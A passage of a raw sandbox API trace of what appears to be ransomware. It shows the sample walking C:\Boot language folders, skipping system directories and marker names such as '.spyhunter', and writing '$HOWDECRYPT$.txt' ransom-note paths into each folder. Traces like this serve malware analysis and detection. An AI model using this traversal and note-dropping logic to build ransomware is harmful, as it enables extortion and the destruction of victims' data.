0x30b6e8 [0080.339] GetProcessHeap () returned 0x2c0000 [0080.339] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b600, Size=0xe8) returned 0x30b778 [0080.339] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.339] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.340] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\$HOWDECRYPT$.txt") returned 34 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Boot\\fr-FR\\$HOWDECRYPT$.txt") returned 34 [0080.340] GetProcessHeap () returned 0x2c0000 [0080.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30cfd8 [0080.340] GetProcessHeap () returned 0x2c0000 [0080.340] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0xf0) returned 0x30b778 [0080.340] GetProcessHeap () returned 0x2c0000 [0080.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.340] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.340] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0080.340] lstrlenW (lpString="Windows") returned 7 [0080.340] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0080.340] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.340] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0080.340] lstrlenW (lpString="System Volume Information") returned 25 [0080.340] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0080.340] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0080.340] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0080.340] GetProcessHeap () returned 0x2c0000 [0080.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.340] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0080.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.340] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.340] lstrlenW (lpString="Windows") returned 7 [0080.340] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.340] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.340] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.340] lstrlenW (lpString="System Volume Information") returned 25 [0080.340] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0080.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.340] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.341] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.341] lstrlenW (lpString="Windows") returned 7 [0080.341] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.341] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.341] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.341] lstrlenW (lpString="System Volume Information") returned 25 [0080.341] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0080.341] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.341] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.341] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.341] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.341] lstrlenW (lpString="Windows") returned 7 [0080.341] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.341] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.341] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.341] lstrlenW (lpString="System Volume Information") returned 25 [0080.341] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0080.341] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.341] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.341] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.341] lstrlenW (lpString="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0080.341] GetProcessHeap () returned 0x2c0000 [0080.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d068 [0080.341] GetProcessHeap () returned 0x2c0000 [0080.341] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0xf8) returned 0x30b778 [0080.341] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.341] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.341] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\$HOWDECRYPT$.txt") returned 34 [0080.341] lstrlenW (lpString="\\\\?\\C:\\Boot\\hu-HU\\$HOWDECRYPT$.txt") returned 34 [0080.341] GetProcessHeap () returned 0x2c0000 [0080.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d0f8 [0080.341] GetProcessHeap () returned 0x2c0000 [0080.341] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x100) returned 0x30b778 [0080.341] GetProcessHeap () returned 0x2c0000 [0080.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.342] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.342] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0080.342] lstrlenW (lpString="Windows") returned 7 [0080.342] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0080.342] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.342] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0080.342] lstrlenW (lpString="System Volume Information") returned 25 [0080.342] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0080.342] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0080.342] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0080.342] GetProcessHeap () returned 0x2c0000 [0080.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.342] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0080.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.343] lstrlenW (lpString="Windows") returned 7 [0080.343] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.343] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.343] lstrlenW (lpString="System Volume Information") returned 25 [0080.343] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0080.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.343] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.343] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.343] lstrlenW (lpString="Windows") returned 7 [0080.343] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.343] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.343] lstrlenW (lpString="System Volume Information") returned 25 [0080.343] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0080.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.343] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.343] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.343] lstrlenW (lpString="Windows") returned 7 [0080.343] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.343] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.343] lstrlenW (lpString="System Volume Information") returned 25 [0080.343] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0080.343] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.343] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.343] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.343] lstrlenW (lpString="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0080.343] GetProcessHeap () returned 0x2c0000 [0080.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d188 [0080.343] GetProcessHeap () returned 0x2c0000 [0080.343] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x108) returned 0x30b778 [0080.343] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.343] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.343] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\$HOWDECRYPT$.txt") returned 34 [0080.343] lstrlenW (lpString="\\\\?\\C:\\Boot\\it-IT\\$HOWDECRYPT$.txt") returned 34 [0080.343] GetProcessHeap () returned 0x2c0000 [0080.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d218 [0080.344] GetProcessHeap () returned 0x2c0000 [0080.344] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x110) returned 0x30b778 [0080.344] GetProcessHeap () returned 0x2c0000 [0080.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.344] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.344] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0080.344] lstrlenW (lpString="Windows") returned 7 [0080.344] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0080.344] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.344] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0080.344] lstrlenW (lpString="System Volume Information") returned 25 [0080.344] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0080.344] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0080.344] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0080.344] GetProcessHeap () returned 0x2c0000 [0080.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.344] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0080.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.344] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.344] lstrlenW (lpString="Windows") returned 7 [0080.344] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.344] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.344] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.344] lstrlenW (lpString="System Volume Information") returned 25 [0080.344] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0080.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.344] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.344] lstrlenW (lpString="Windows") returned 7 [0080.344] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.344] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.344] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.344] lstrlenW (lpString="System Volume Information") returned 25 [0080.345] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0080.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.345] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.345] lstrlenW (lpString="Windows") returned 7 [0080.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.345] lstrlenW (lpString="System Volume Information") returned 25 [0080.345] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0080.345] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.345] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.345] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.345] lstrlenW (lpString="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d2a8 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.345] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x118) returned 0x30b778 [0080.345] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.345] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.345] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\$HOWDECRYPT$.txt") returned 34 [0080.345] lstrlenW (lpString="\\\\?\\C:\\Boot\\ja-JP\\$HOWDECRYPT$.txt") returned 34 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d338 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.345] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x120) returned 0x30b778 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.345] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.345] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0080.345] lstrlenW (lpString="Windows") returned 7 [0080.345] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0080.345] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.345] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0080.345] lstrlenW (lpString="System Volume Information") returned 25 [0080.345] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0080.345] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0080.345] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0080.345] GetProcessHeap () returned 0x2c0000 [0080.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.346] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0080.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.347] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.347] lstrlenW (lpString="Windows") returned 7 [0080.347] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.347] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.347] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.347] lstrlenW (lpString="System Volume Information") returned 25 [0080.347] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0080.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.347] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.347] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.347] lstrlenW (lpString="Windows") returned 7 [0080.347] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.347] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.347] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.347] lstrlenW (lpString="System Volume Information") returned 25 [0080.347] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0080.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.347] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.347] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.347] lstrlenW (lpString="Windows") returned 7 [0080.347] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.347] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.347] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.347] lstrlenW (lpString="System Volume Information") returned 25 [0080.347] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0080.347] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.347] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.347] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0080.347] GetProcessHeap () returned 0x2c0000 [0080.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d3c8 [0080.347] GetProcessHeap () returned 0x2c0000 [0080.347] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x128) returned 0x30b778 [0080.348] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.348] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.348] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\$HOWDECRYPT$.txt") returned 34 [0080.348] lstrlenW (lpString="\\\\?\\C:\\Boot\\ko-KR\\$HOWDECRYPT$.txt") returned 34 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d458 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.348] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x130) returned 0x30b778 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.348] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.348] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0080.348] lstrlenW (lpString="Windows") returned 7 [0080.348] lstrcmpiW (lpString1="memtest.exe", lpString2="$Recycle.bin") returned 1 [0080.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.348] lstrcmpiW (lpString1="memtest.exe", lpString2="System Volume Information") returned -1 [0080.348] lstrlenW (lpString="System Volume Information") returned 25 [0080.348] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0080.348] StrStrIW (lpFirst="memtest.exe", lpSrch=".spyhunter") returned 0x0 [0080.348] lstrcmpW (lpString1="memtest.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.348] lstrcmpW (lpString1="memtest.exe", lpString2="_uninstalling_.png") returned 1 [0080.348] lstrlenW (lpString="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30ca40 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.348] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x138) returned 0x30b778 [0080.348] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.348] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0080.348] lstrlenW (lpString="Windows") returned 7 [0080.348] lstrcmpiW (lpString1="nb-NO", lpString2="$Recycle.bin") returned 1 [0080.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.348] lstrcmpiW (lpString1="nb-NO", lpString2="System Volume Information") returned -1 [0080.348] lstrlenW (lpString="System Volume Information") returned 25 [0080.348] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0080.348] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0080.348] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0080.348] GetProcessHeap () returned 0x2c0000 [0080.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.349] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0080.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.349] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.349] lstrlenW (lpString="Windows") returned 7 [0080.349] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.349] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.349] lstrlenW (lpString="System Volume Information") returned 25 [0080.349] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0080.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.349] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.349] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.349] lstrlenW (lpString="Windows") returned 7 [0080.349] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.349] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.349] lstrlenW (lpString="System Volume Information") returned 25 [0080.349] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0080.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.349] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.349] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.349] lstrlenW (lpString="Windows") returned 7 [0080.349] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.349] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.349] lstrlenW (lpString="System Volume Information") returned 25 [0080.349] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0080.349] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.349] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.349] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.349] lstrlenW (lpString="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0080.349] GetProcessHeap () returned 0x2c0000 [0080.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d4e8 [0080.350] GetProcessHeap () returned 0x2c0000 [0080.350] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x140) returned 0x30b778 [0080.350] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.350] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.350] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\$HOWDECRYPT$.txt") returned 34 [0080.350] lstrlenW (lpString="\\\\?\\C:\\Boot\\nb-NO\\$HOWDECRYPT$.txt") returned 34 [0080.350] GetProcessHeap () returned 0x2c0000 [0080.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d578 [0080.350] 